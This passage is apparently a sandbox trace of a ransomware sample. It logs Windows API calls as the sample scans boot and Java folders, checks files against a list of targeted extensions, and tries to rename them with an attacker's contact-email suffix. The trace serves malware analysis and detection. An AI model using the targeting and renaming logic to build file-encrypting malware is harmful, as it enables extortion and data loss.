(lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0156.938] lstrlenW (lpString=".doc") returned 4 [0156.938] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0156.938] lstrlenW (lpString=".docx") returned 5 [0156.938] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0156.938] lstrlenW (lpString=".pdf") returned 4 [0156.938] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0156.938] lstrlenW (lpString=".xls") returned 4 [0156.938] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0156.938] lstrlenW (lpString=".xlsx") returned 5 [0156.938] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0156.938] lstrlenW (lpString=".ppt") returned 4 [0156.938] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0156.938] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0156.938] lstrlenW (lpString=".zip") returned 4 [0156.938] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0156.938] lstrlenW (lpString=".rar") returned 4 [0156.938] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0156.938] lstrlenW (lpString=".bz2") returned 4 [0156.938] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0156.939] lstrlenW (lpString=".7z") returned 3 [0156.939] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0156.939] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0156.939] lstrlenW (lpString=".dbf") returned 4 [0156.939] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0156.939] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0156.939] lstrlenW (lpString=".1cd") returned 4 [0156.939] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0156.939] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0156.939] lstrlenW (lpString=".jpg") returned 4 [0156.939] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0156.939] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0156.939] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0156.939] lstrlenW (lpString=".doc") returned 4 [0156.939] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0156.939] lstrlenW (lpString=".docx") returned 5 [0156.939] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0156.939] lstrlenW (lpString=".pdf") returned 4 [0156.939] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0156.939] lstrlenW (lpString=".xls") returned 4 [0156.940] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0156.940] lstrlenW (lpString=".xlsx") returned 5 [0156.940] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0156.940] lstrlenW (lpString=".ppt") returned 4 [0156.940] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0156.940] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0156.940] lstrlenW (lpString=".zip") returned 4 [0156.940] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0156.940] lstrlenW (lpString=".rar") returned 4 [0156.940] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0156.940] lstrlenW (lpString=".bz2") returned 4 [0156.940] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0156.940] lstrlenW (lpString=".7z") returned 3 [0156.940] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0156.940] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0156.940] lstrlenW (lpString=".dbf") returned 4 [0156.940] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0156.940] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0156.940] lstrlenW (lpString=".1cd") returned 4 [0156.940] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0156.940] lstrlenW (lpString="C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 29 [0156.940] lstrlenW (lpString=".jpg") returned 4 [0156.940] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0156.941] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0156.941] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0156.941] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0156.941] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=75616) returned 1 [0156.941] CloseHandle (hObject=0x340) returned 1 [0156.941] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0156.941] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0156.942] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0156.942] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0156.942] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0156.942] lstrlenW (lpString=".doc") returned 4 [0156.942] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0156.942] lstrlenW (lpString=".docx") returned 5 [0156.942] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0156.942] lstrlenW (lpString=".pdf") returned 4 [0156.942] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0156.942] lstrlenW (lpString=".xls") returned 4 [0156.942] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0156.942] lstrlenW (lpString=".xlsx") returned 5 [0156.942] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0156.942] lstrlenW (lpString=".ppt") returned 4 [0156.942] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0156.942] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0156.942] lstrlenW (lpString=".zip") returned 4 [0156.943] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0156.943] lstrlenW (lpString=".rar") returned 4 [0156.943] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0156.943] lstrlenW (lpString=".bz2") returned 4 [0156.943] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0156.943] lstrlenW (lpString=".7z") returned 3 [0156.943] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0156.943] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0156.943] lstrlenW (lpString=".dbf") returned 4 [0156.943] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0156.943] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0156.943] lstrlenW (lpString=".1cd") returned 4 [0156.943] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0156.943] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0156.943] lstrlenW (lpString=".jpg") returned 4 [0156.943] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0156.943] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0156.943] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0156.943] lstrlenW (lpString=".doc") returned 4 [0156.943] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0156.943] lstrlenW (lpString=".docx") returned 5 [0156.944] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0156.944] lstrlenW (lpString=".pdf") returned 4 [0156.944] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0156.944] lstrlenW (lpString=".xls") returned 4 [0156.944] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0156.944] lstrlenW (lpString=".xlsx") returned 5 [0156.944] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0156.944] lstrlenW (lpString=".ppt") returned 4 [0156.944] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0156.944] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0156.944] lstrlenW (lpString=".zip") returned 4 [0156.944] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0156.944] lstrlenW (lpString=".rar") returned 4 [0156.944] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0156.944] lstrlenW (lpString=".bz2") returned 4 [0156.945] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0156.945] lstrlenW (lpString=".7z") returned 3 [0156.945] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0156.945] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0156.945] lstrlenW (lpString=".dbf") returned 4 [0156.945] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0156.945] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0156.945] lstrlenW (lpString=".1cd") returned 4 [0156.945] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0156.945] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0156.945] lstrlenW (lpString=".jpg") returned 4 [0156.946] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0156.946] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0156.946] lstrlenW (lpString="memtest.exe.mui") returned 15 [0156.946] CreateFileW (lpFileName="C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0156.946] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=45472) returned 1 [0156.946] CloseHandle (hObject=0x340) returned 1 [0156.946] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui")) returned 0x20 [0156.947] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\memtest.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0156.947] CreateFileW (lpFileName="C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0156.947] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0156.947] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0156.947] lstrlenW (lpString=".doc") returned 4 [0156.947] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0156.947] lstrlenW (lpString=".docx") returned 5 [0156.947] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0156.947] lstrlenW (lpString=".pdf") returned 4 [0156.947] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0156.947] lstrlenW (lpString=".xls") returned 4 [0156.947] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0156.947] lstrlenW (lpString=".xlsx") returned 5 [0156.947] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0156.947] lstrlenW (lpString=".ppt") returned 4 [0156.947] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0156.947] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0156.948] lstrlenW (lpString=".zip") returned 4 [0156.948] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0156.948] lstrlenW (lpString=".rar") returned 4 [0156.948] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0156.948] lstrlenW (lpString=".bz2") returned 4 [0156.948] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0156.948] lstrlenW (lpString=".7z") returned 3 [0156.948] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0156.948] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0156.948] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0156.948] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0156.949] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=79200) returned 1 [0156.949] CloseHandle (hObject=0x340) returned 1 [0156.951] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0156.951] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0156.951] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0156.952] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0156.952] CreateFileW (lpFileName="C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0156.952] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=45984) returned 1 [0156.952] CloseHandle (hObject=0x340) returned 1 [0156.952] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui")) returned 0x20 [0156.953] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\memtest.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\de-de\\memtest.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0156.953] CreateFileW (lpFileName="C:\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0156.953] Sleep (dwMilliseconds=0x64) [0157.264] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0157.409] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0 [0158.152] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x4591fc0, Size=0x4000) returned 0x4591fc0 [0158.152] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0158.152] lstrlenW (lpString="fxplugins.dll") returned 13 [0158.152] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.154] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=186944) returned 1 [0158.154] CloseHandle (hObject=0x414) returned 1 [0158.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll")) returned 0x20 [0158.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.154] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.154] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0158.154] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0158.154] lstrlenW (lpString=".doc") returned 4 [0158.154] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.154] lstrlenW (lpString=".docx") returned 5 [0158.154] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0158.154] lstrlenW (lpString=".pdf") returned 4 [0158.155] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.155] lstrlenW (lpString=".xls") returned 4 [0158.155] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.155] lstrlenW (lpString=".xlsx") returned 5 [0158.155] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0158.155] lstrlenW (lpString=".ppt") returned 4 [0158.155] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.155] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0158.155] lstrlenW (lpString=".zip") returned 4 [0158.155] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.155] lstrlenW (lpString=".rar") returned 4 [0158.155] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.155] lstrlenW (lpString=".bz2") returned 4 [0158.155] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.155] lstrlenW (lpString=".7z") returned 3 [0158.155] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.155] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0158.155] lstrlenW (lpString=".dbf") returned 4 [0158.155] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.155] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0158.155] lstrlenW (lpString=".1cd") returned 4 [0158.155] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.155] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0158.155] lstrlenW (lpString=".jpg") returned 4 [0158.155] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.155] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0158.156] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0158.156] lstrlenW (lpString=".doc") returned 4 [0158.156] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.156] lstrlenW (lpString=".docx") returned 5 [0158.156] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0158.156] lstrlenW (lpString=".pdf") returned 4 [0158.156] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.156] lstrlenW (lpString=".xls") returned 4 [0158.156] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.156] lstrlenW (lpString=".xlsx") returned 5 [0158.156] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0158.156] lstrlenW (lpString=".ppt") returned 4 [0158.156] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.156] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0158.156] lstrlenW (lpString=".zip") returned 4 [0158.156] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.156] lstrlenW (lpString=".rar") returned 4 [0158.156] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.156] lstrlenW (lpString=".bz2") returned 4 [0158.156] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.156] lstrlenW (lpString=".7z") returned 3 [0158.156] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.156] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0158.156] lstrlenW (lpString=".dbf") returned 4 [0158.156] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.156] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0158.156] lstrlenW (lpString=".1cd") returned 4 [0158.156] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.157] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 52 [0158.157] lstrlenW (lpString=".jpg") returned 4 [0158.157] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.157] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0158.157] lstrlenW (lpString="glass.dll") returned 9 [0158.157] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.158] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x327ff14 | out: lpFileSize=0x327ff14*=265792) returned 1 [0158.158] CloseHandle (hObject=0x414) returned 1 [0158.158] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll")) returned 0x20 [0158.158] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.158] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.158] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0158.158] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0158.158] lstrlenW (lpString=".doc") returned 4 [0158.158] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.158] lstrlenW (lpString=".docx") returned 5 [0158.158] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0158.158] lstrlenW (lpString=".pdf") returned 4 [0158.158] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.158] lstrlenW (lpString=".xls") returned 4 [0158.159] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.159] lstrlenW (lpString=".xlsx") returned 5 [0158.159] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0158.159] lstrlenW (lpString=".ppt") returned 4 [0158.159] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.159] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0158.159] lstrlenW (lpString=".zip") returned 4 [0158.159] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.159] lstrlenW (lpString=".rar") returned 4 [0158.159] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.159] lstrlenW (lpString=".bz2") returned 4 [0158.159] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.159] lstrlenW (lpString=".7z") returned 3 [0158.159] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.159] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0158.159] lstrlenW (lpString=".dbf") returned 4 [0158.159] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.159] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0158.159] lstrlenW (lpString=".1cd") returned 4 [0158.159] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.159] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0158.159] lstrlenW (lpString=".jpg") returned 4 [0158.159] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.159] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0158.159] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0158.159] lstrlenW (lpString=".doc") returned 4 [0158.159] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0158.159] lstrlenW (lpString=".docx") returned 5 [0158.160] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0158.160] lstrlenW (lpString=".pdf") returned 4 [0158.160] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0158.160] lstrlenW (lpString=".xls") returned 4 [0158.160] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0158.160] lstrlenW (lpString=".xlsx") returned 5 [0158.160] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0158.160] lstrlenW (lpString=".ppt") returned 4 [0158.160] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0158.160] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0158.160] lstrlenW (lpString=".zip") returned 4 [0158.160] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0158.160] lstrlenW (lpString=".rar") returned 4 [0158.160] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0158.160] lstrlenW (lpString=".bz2") returned 4 [0158.160] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0158.160] lstrlenW (lpString=".7z") returned 3 [0158.160] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0158.160] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0158.160] lstrlenW (lpString=".dbf") returned 4 [0158.160] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0158.160] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0158.160] lstrlenW (lpString=".1cd") returned 4 [0158.160] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0158.160] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 48 [0158.160] lstrlenW (lpString=".jpg") returned 4 [0158.160] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0158.161] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0158.161] lstrlenW (lpString="glib-lite.dll") returned 13 